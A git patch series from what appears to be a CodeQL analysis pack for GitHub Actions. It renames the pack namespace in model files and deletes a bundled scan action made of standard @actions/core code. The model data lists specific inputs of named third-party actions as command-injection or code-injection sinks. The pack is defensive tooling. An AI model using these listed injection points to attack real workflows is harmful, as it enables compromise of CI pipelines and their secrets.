 - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"]
diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml
index f056cf5d864..872964f8215 100644
--- a/ql/lib/ext/timheuer_base64-to-file.model.yml
+++ b/ql/lib/ext/timheuer_base64-to-file.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"]
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml
index 838f0b30848..91f3c056e6d 100644
--- a/ql/lib/ext/tj-actions_branch-names.model.yml
+++ b/ql/lib/ext/tj-actions_branch-names.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/tj-actions/branch-names
diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml
index c215755f61d..79a12582e9e 100644
--- a/ql/lib/ext/trilom_file-changes-action.model.yml
+++ b/ql/lib/ext/trilom_file-changes-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"]
diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
index 014e779b29a..a534e3dfcf7 100644
--- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml
+++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"]
diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
index 806c055529d..dfaa2e2687d 100644
--- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml
+++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"]
diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml
index d6e554a8709..f87beb15018 100644
--- a/ql/lib/ext/tzkhan_pr-update-action.model.yml
+++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"]
diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml
index 55d1531a770..59cc155b550 100644
--- a/ql/lib/ext/veracode_veracode-sca.model.yml
+++ b/ql/lib/ext/veracode_veracode-sca.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"]
diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml
index c52d62e204a..52dcff39903 100644
--- a/ql/lib/ext/wearerequired_lint-action.model.yml
+++ b/ql/lib/ext/wearerequired_lint-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"]
diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml
index 1e915194d96..f9e122c17a9 100644
--- a/ql/lib/ext/webfactory_ssh-agent.model.yml
+++ b/ql/lib/ext/webfactory_ssh-agent.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"]
diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml
index ff02589fb84..1f0401e8e61 100644
--- a/ql/lib/ext/workflow-models/workflow-models.yml
+++ b/ql/lib/ext/workflow-models/workflow-models.yml
@@ -1,14 +1,14 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: repositoryDataModel
 data: []
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: workflowDataModel
 data: []
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: contextTriggerDataModel
 data:
 - ["commit_comment", "github.event.comment"]
@@ -55,7 +55,7 @@ extensions:
 - ["workflow_call", "github.event.workflow"]
 - ["workflow_call", "github.event.workflow_run"]
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: externallyTriggerableEventsDataModel
 data:
 - ["discussion"]
diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml
index 1cc360c472d..0910261d21d 100644
--- a/ql/lib/ext/xt0rted_slash-command-action.model.yml
+++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"]
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml
index cb7e0936cca..91df4767a72 100644
--- a/ql/lib/ext/zaproxy_action-baseline.model.yml
+++ b/ql/lib/ext/zaproxy_action-baseline.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"]
diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml
index 210c3365eda..57f76c8cb4a 100644
--- a/ql/lib/ext/zaproxy_action-full-scan.model.yml
+++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"]
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 10d9eeddcf7..70edc1b0574 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: true
 warnOnImplicitThis: true
-name: githubsecuritylab/actions-all
+name: github/actions-all
 version: 0.1.2
 dependencies:
 codeql/util: ^1.0.0
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 16bad7c15bd..89df5ee8797 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,6 +1,6 @@
 ---
 library: false
-name: githubsecuritylab/actions-queries
+name: github/actions-queries
 version: 0.1.2
 groups: [actions, queries]
 suites: codeql-suites
@@ -8,5 +8,5 @@ extractor: javascript
 dbscheme: semmlecode.javascript.dbscheme
 defaultSuiteFile: codeql-suites/actions-code-scanning.qls
 dependencies:
- githubsecuritylab/actions-all: ${workspace}
+ github/actions-all: ${workspace}
 warnOnImplicitThis: true
diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml
index 1676d742d37..77e25d8e419 100644
--- a/ql/test/qlpack.yml
+++ b/ql/test/qlpack.yml
@@ -1,9 +1,9 @@
 ---
-name: githubsecuritylab/actions-tests
+name: github/actions-tests
 groups: [javascript, test]
 dependencies:
- githubsecuritylab/actions-all: ${workspace}
- githubsecuritylab/actions-queries: ${workspace}
+ github/actions-all: ${workspace}
+ github/actions-queries: ${workspace}
 extractor: javascript
 tests: .
 warnOnImplicitThis: true
From 06918b0492705cd23477e966184ad59c7262477f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 21 Jun 2024 09:19:37 +0200
Subject: [PATCH 0342/1267] Remove custom scan action
---
 .github/action/.gitignore | 1 -
 .github/action/dist/index.js | 30722 -----------------------
 .github/action/dist/licenses.txt | 175 -
 .github/action/package-lock.json | 639 -
 .github/action/package.json | 48 -
 .github/action/src/codeql.ts | 172 -
 .github/action/src/index.ts | 61 -
 .github/action/tsconfig.json | 24 -
 .github/workflows/build.yml | 30 -
 .github/workflows/copy-to-bughalla.yml | 34 -
 action.yml | 51 -
 clean.sh | 2 -
 12 files changed, 31959 deletions(-)
 delete mode 100644 .github/action/.gitignore
 delete mode 100644 .github/action/dist/index.js
 delete mode 100644 .github/action/dist/licenses.txt
 delete mode 100644 .github/action/package-lock.json
 delete mode 100644 .github/action/package.json
 delete mode 100644 .github/action/src/codeql.ts
 delete mode 100644 .github/action/src/index.ts
 delete mode 100644 .github/action/tsconfig.json
 delete mode 100644 .github/workflows/build.yml
 delete mode 100644 .github/workflows/copy-to-bughalla.yml
 delete mode 100644 action.yml
 delete mode 100755 clean.sh
diff --git a/.github/action/.gitignore b/.github/action/.gitignore
deleted file mode 100644
index c2658d7d1b3..00000000000
--- a/.github/action/.gitignore
+++ /dev/null
@@ -1 +0,0 @@
-node_modules/
diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js
deleted file mode 100644
index 7281eb9d9b5..00000000000
--- a/.github/action/dist/index.js
+++ /dev/null
@@ -1,30722 +0,0 @@ -/******/ (() => { // webpackBootstrap -/******/ var __webpack_modules__ = ({ - -/***/ 7351: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.issue = exports.issueCommand = void 0; -const os = __importStar(__nccwpck_require__(2037)); -const utils_1 = __nccwpck_require__(5278); -/** - * Commands - * - * Command Format: - * ::name key=value,key=value::message - * - * Examples: - * ::warning::This is the message - * ::set-env name=MY_VAR::some value - */ -function issueCommand(command, properties, message) { - const cmd = new Command(command, properties, message); - process.stdout.write(cmd.toString() + os.EOL); -} -exports.issueCommand = issueCommand; -function issue(name, message = '') { - issueCommand(name, {}, message); -} -exports.issue = issue; -const CMD_STRING = '::'; -class Command { - constructor(command, properties, message) { - if (!command) { - command = 'missing.command'; - } - this.command = command; - this.properties = properties; - this.message = message; - } - toString() { - let cmdStr = 
CMD_STRING + this.command; - if (this.properties && Object.keys(this.properties).length > 0) { - cmdStr += ' '; - let first = true; - for (const key in this.properties) { - if (this.properties.hasOwnProperty(key)) { - const val = this.properties[key]; - if (val) { - if (first) { - first = false; - } - else { - cmdStr += ','; - } - cmdStr += `${key}=${escapeProperty(val)}`; - } - } - } - } - cmdStr += `${CMD_STRING}${escapeData(this.message)}`; - return cmdStr; - } -} -function escapeData(s) { - return utils_1.toCommandValue(s) - .replace(/%/g, '%25') - .replace(/\r/g, '%0D') - .replace(/\n/g, '%0A'); -} -function escapeProperty(s) { - return utils_1.toCommandValue(s) - .replace(/%/g, '%25') - .replace(/\r/g, '%0D') - .replace(/\n/g, '%0A') - .replace(/:/g, '%3A') - .replace(/,/g, '%2C'); -} -//# sourceMappingURL=command.js.map - -/***/ }), - -/***/ 2186: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getIDToken = exports.getState = exports.saveState = exports.group = exports.endGroup = exports.startGroup = exports.info = exports.notice = exports.warning = exports.error = exports.debug = exports.isDebug = exports.setFailed = exports.setCommandEcho = exports.setOutput = exports.getBooleanInput = exports.getMultilineInput = exports.getInput = exports.addPath = exports.setSecret = exports.exportVariable = exports.ExitCode = void 0; -const command_1 = __nccwpck_require__(7351); -const file_command_1 = __nccwpck_require__(717); -const utils_1 = __nccwpck_require__(5278); -const os = __importStar(__nccwpck_require__(2037)); -const path = __importStar(__nccwpck_require__(1017)); -const oidc_utils_1 = __nccwpck_require__(8041); -/** - * The code to exit an action - */ -var ExitCode; -(function (ExitCode) { - /** - * A code indicating that the action was successful - */ - ExitCode[ExitCode["Success"] = 0] = "Success"; - /** - * A code indicating that the action was a failure - */ - ExitCode[ExitCode["Failure"] = 1] = "Failure"; -})(ExitCode = exports.ExitCode || (exports.ExitCode = {})); -//----------------------------------------------------------------------- -// Variables -//----------------------------------------------------------------------- -/** - * Sets env variable for this action and future actions in the job - * @param name the name of the variable to set - * @param val the value of the 
variable. Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function exportVariable(name, val) { - const convertedVal = utils_1.toCommandValue(val); - process.env[name] = convertedVal; - const filePath = process.env['GITHUB_ENV'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('ENV', file_command_1.prepareKeyValueMessage(name, val)); - } - command_1.issueCommand('set-env', { name }, convertedVal); -} -exports.exportVariable = exportVariable; -/** - * Registers a secret which will get masked from logs - * @param secret value of the secret - */ -function setSecret(secret) { - command_1.issueCommand('add-mask', {}, secret); -} -exports.setSecret = setSecret; -/** - * Prepends inputPath to the PATH (for this action and future actions) - * @param inputPath - */ -function addPath(inputPath) { - const filePath = process.env['GITHUB_PATH'] || ''; - if (filePath) { - file_command_1.issueFileCommand('PATH', inputPath); - } - else { - command_1.issueCommand('add-path', {}, inputPath); - } - process.env['PATH'] = `${inputPath}${path.delimiter}${process.env['PATH']}`; -} -exports.addPath = addPath; -/** - * Gets the value of an input. - * Unless trimWhitespace is set to false in InputOptions, the value is also trimmed. - * Returns an empty string if the value is not defined. - * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns string - */ -function getInput(name, options) { - const val = process.env[`INPUT_${name.replace(/ /g, '_').toUpperCase()}`] || ''; - if (options && options.required && !val) { - throw new Error(`Input required and not supplied: ${name}`); - } - if (options && options.trimWhitespace === false) { - return val; - } - return val.trim(); -} -exports.getInput = getInput; -/** - * Gets the values of an multiline input. Each value is also trimmed. 
- * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns string[] - * - */ -function getMultilineInput(name, options) { - const inputs = getInput(name, options) - .split('\n') - .filter(x => x !== ''); - if (options && options.trimWhitespace === false) { - return inputs; - } - return inputs.map(input => input.trim()); -} -exports.getMultilineInput = getMultilineInput; -/** - * Gets the input value of the boolean type in the YAML 1.2 "core schema" specification. - * Support boolean input list: `true | True | TRUE | false | False | FALSE` . - * The return value is also in boolean type. - * ref: https://yaml.org/spec/1.2/spec.html#id2804923 - * - * @param name name of the input to get - * @param options optional. See InputOptions. - * @returns boolean - */ -function getBooleanInput(name, options) { - const trueValue = ['true', 'True', 'TRUE']; - const falseValue = ['false', 'False', 'FALSE']; - const val = getInput(name, options); - if (trueValue.includes(val)) - return true; - if (falseValue.includes(val)) - return false; - throw new TypeError(`Input does not meet YAML 1.2 "Core Schema" specification: ${name}\n` + - `Support boolean input list: \`true | True | TRUE | false | False | FALSE\``); -} -exports.getBooleanInput = getBooleanInput; -/** - * Sets the value of an output. - * - * @param name name of the output to set - * @param value value to store. 
Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function setOutput(name, value) { - const filePath = process.env['GITHUB_OUTPUT'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('OUTPUT', file_command_1.prepareKeyValueMessage(name, value)); - } - process.stdout.write(os.EOL); - command_1.issueCommand('set-output', { name }, utils_1.toCommandValue(value)); -} -exports.setOutput = setOutput; -/** - * Enables or disables the echoing of commands into stdout for the rest of the step. - * Echoing is disabled by default if ACTIONS_STEP_DEBUG is not set. - * - */ -function setCommandEcho(enabled) { - command_1.issue('echo', enabled ? 'on' : 'off'); -} -exports.setCommandEcho = setCommandEcho; -//----------------------------------------------------------------------- -// Results -//----------------------------------------------------------------------- -/** - * Sets the action status to failed. - * When the action exits it will be with an exit code of 1 - * @param message add error issue message - */ -function setFailed(message) { - process.exitCode = ExitCode.Failure; - error(message); -} -exports.setFailed = setFailed; -//----------------------------------------------------------------------- -// Logging Commands -//----------------------------------------------------------------------- -/** - * Gets whether Actions Step Debug is on or not - */ -function isDebug() { - return process.env['RUNNER_DEBUG'] === '1'; -} -exports.isDebug = isDebug; -/** - * Writes debug message to user log - * @param message debug message - */ -function debug(message) { - command_1.issueCommand('debug', {}, message); -} -exports.debug = debug; -/** - * Adds an error issue - * @param message error issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. 
- */ -function error(message, properties = {}) { - command_1.issueCommand('error', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.error = error; -/** - * Adds a warning issue - * @param message warning issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. - */ -function warning(message, properties = {}) { - command_1.issueCommand('warning', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.warning = warning; -/** - * Adds a notice issue - * @param message notice issue message. Errors will be converted to string via toString() - * @param properties optional properties to add to the annotation. - */ -function notice(message, properties = {}) { - command_1.issueCommand('notice', utils_1.toCommandProperties(properties), message instanceof Error ? message.toString() : message); -} -exports.notice = notice; -/** - * Writes info to log with console.log. - * @param message info message - */ -function info(message) { - process.stdout.write(message + os.EOL); -} -exports.info = info; -/** - * Begin an output group. - * - * Output until the next `groupEnd` will be foldable in this group - * - * @param name The name of the output group - */ -function startGroup(name) { - command_1.issue('group', name); -} -exports.startGroup = startGroup; -/** - * End an output group. - */ -function endGroup() { - command_1.issue('endgroup'); -} -exports.endGroup = endGroup; -/** - * Wrap an asynchronous function call in a group. - * - * Returns the same type as the function itself. 
- * - * @param name The name of the group - * @param fn The function to wrap in the group - */ -function group(name, fn) { - return __awaiter(this, void 0, void 0, function* () { - startGroup(name); - let result; - try { - result = yield fn(); - } - finally { - endGroup(); - } - return result; - }); -} -exports.group = group; -//----------------------------------------------------------------------- -// Wrapper action state -//----------------------------------------------------------------------- -/** - * Saves state for current action, the state can only be retrieved by this action's post job execution. - * - * @param name name of the state to store - * @param value value to store. Non-string values will be converted to a string via JSON.stringify - */ -// eslint-disable-next-line @typescript-eslint/no-explicit-any -function saveState(name, value) { - const filePath = process.env['GITHUB_STATE'] || ''; - if (filePath) { - return file_command_1.issueFileCommand('STATE', file_command_1.prepareKeyValueMessage(name, value)); - } - command_1.issueCommand('save-state', { name }, utils_1.toCommandValue(value)); -} -exports.saveState = saveState; -/** - * Gets the value of an state set by this action's main execution. 
- * - * @param name name of the state to get - * @returns string - */ -function getState(name) { - return process.env[`STATE_${name}`] || ''; -} -exports.getState = getState; -function getIDToken(aud) { - return __awaiter(this, void 0, void 0, function* () { - return yield oidc_utils_1.OidcClient.getIDToken(aud); - }); -} -exports.getIDToken = getIDToken; -/** - * Summary exports - */ -var summary_1 = __nccwpck_require__(1327); -Object.defineProperty(exports, "summary", ({ enumerable: true, get: function () { return summary_1.summary; } })); -/** - * @deprecated use core.summary - */ -var summary_2 = __nccwpck_require__(1327); -Object.defineProperty(exports, "markdownSummary", ({ enumerable: true, get: function () { return summary_2.markdownSummary; } })); -/** - * Path exports - */ -var path_utils_1 = __nccwpck_require__(2981); -Object.defineProperty(exports, "toPosixPath", ({ enumerable: true, get: function () { return path_utils_1.toPosixPath; } })); -Object.defineProperty(exports, "toWin32Path", ({ enumerable: true, get: function () { return path_utils_1.toWin32Path; } })); -Object.defineProperty(exports, "toPlatformPath", ({ enumerable: true, get: function () { return path_utils_1.toPlatformPath; } })); -//# sourceMappingURL=core.js.map - -/***/ }), - -/***/ 717: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -// For internal use, subject to change. -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.prepareKeyValueMessage = exports.issueFileCommand = void 0; -// We use any as a valid input type -/* eslint-disable @typescript-eslint/no-explicit-any */ -const fs = __importStar(__nccwpck_require__(7147)); -const os = __importStar(__nccwpck_require__(2037)); -const uuid_1 = __nccwpck_require__(5840); -const utils_1 = __nccwpck_require__(5278); -function issueFileCommand(command, message) { - const filePath = process.env[`GITHUB_${command}`]; - if (!filePath) { - throw new Error(`Unable to find environment variable for file command ${command}`); - } - if (!fs.existsSync(filePath)) { - throw new Error(`Missing file at path: ${filePath}`); - } - fs.appendFileSync(filePath, `${utils_1.toCommandValue(message)}${os.EOL}`, { - encoding: 'utf8' - }); -} -exports.issueFileCommand = issueFileCommand; -function prepareKeyValueMessage(key, value) { - const delimiter = `ghadelimiter_${uuid_1.v4()}`; - const convertedValue = utils_1.toCommandValue(value); - // These should realistically never happen, but just in case someone finds a - // way to exploit uuid generation let's not allow keys or values that contain - // the delimiter. 
- if (key.includes(delimiter)) { - throw new Error(`Unexpected input: name should not contain the delimiter "${delimiter}"`); - } - if (convertedValue.includes(delimiter)) { - throw new Error(`Unexpected input: value should not contain the delimiter "${delimiter}"`); - } - return `${key}<<${delimiter}${os.EOL}${convertedValue}${os.EOL}${delimiter}`; -} -exports.prepareKeyValueMessage = prepareKeyValueMessage; -//# sourceMappingURL=file-command.js.map - -/***/ }), - -/***/ 8041: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.OidcClient = void 0; -const http_client_1 = __nccwpck_require__(6255); -const auth_1 = __nccwpck_require__(5526); -const core_1 = __nccwpck_require__(2186); -class OidcClient { - static createHttpClient(allowRetry = true, maxRetry = 10) { - const requestOptions = { - allowRetries: allowRetry, - maxRetries: maxRetry - }; - return new http_client_1.HttpClient('actions/oidc-client', [new auth_1.BearerCredentialHandler(OidcClient.getRequestToken())], requestOptions); - } - static getRequestToken() { - const token = process.env['ACTIONS_ID_TOKEN_REQUEST_TOKEN']; - if (!token) { - throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_TOKEN env variable'); - } - return token; - } - static getIDTokenUrl() { - const runtimeUrl = process.env['ACTIONS_ID_TOKEN_REQUEST_URL']; - if (!runtimeUrl) { - throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_URL env variable'); - } - return runtimeUrl; - } - static getCall(id_token_url) { - var _a; - return __awaiter(this, void 0, void 0, function* () { - const httpclient = OidcClient.createHttpClient(); - const res = yield httpclient - .getJson(id_token_url) - .catch(error => { - throw new Error(`Failed to get ID Token. \n - Error Code : ${error.statusCode}\n - Error Message: ${error.message}`); - }); - const id_token = (_a = res.result) === null || _a === void 0 ? 
void 0 : _a.value; - if (!id_token) { - throw new Error('Response json body do not have ID Token field'); - } - return id_token; - }); - } - static getIDToken(audience) { - return __awaiter(this, void 0, void 0, function* () { - try { - // New ID Token is requested from action service - let id_token_url = OidcClient.getIDTokenUrl(); - if (audience) { - const encodedAudience = encodeURIComponent(audience); - id_token_url = `${id_token_url}&audience=${encodedAudience}`; - } - core_1.debug(`ID token url is ${id_token_url}`); - const id_token = yield OidcClient.getCall(id_token_url); - core_1.setSecret(id_token); - return id_token; - } - catch (error) { - throw new Error(`Error message: ${error.message}`); - } - }); - } -} -exports.OidcClient = OidcClient; -//# sourceMappingURL=oidc-utils.js.map - -/***/ }), - -/***/ 2981: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
(function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.toPlatformPath = exports.toWin32Path = exports.toPosixPath = void 0; -const path = __importStar(__nccwpck_require__(1017)); -/** - * toPosixPath converts the given path to the posix form. On Windows, \\ will be - * replaced with /. - * - * @param pth. Path to transform. - * @return string Posix path. - */ -function toPosixPath(pth) { - return pth.replace(/[\\]/g, '/'); -} -exports.toPosixPath = toPosixPath; -/** - * toWin32Path converts the given path to the win32 form. On Linux, / will be - * replaced with \\. - * - * @param pth. Path to transform. - * @return string Win32 path. - */ -function toWin32Path(pth) { - return pth.replace(/[/]/g, '\\'); -} -exports.toWin32Path = toWin32Path; -/** - * toPlatformPath converts the given path to a platform-specific path. It does - * this by replacing instances of / and \ with the platform-specific path - * separator. - * - * @param pth The path to platformize. - * @return string The platform-specific path. - */ -function toPlatformPath(pth) { - return pth.replace(/[/\\]/g, path.sep); -} -exports.toPlatformPath = toPlatformPath; -//# sourceMappingURL=path-utils.js.map - -/***/ }), - -/***/ 1327: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? 
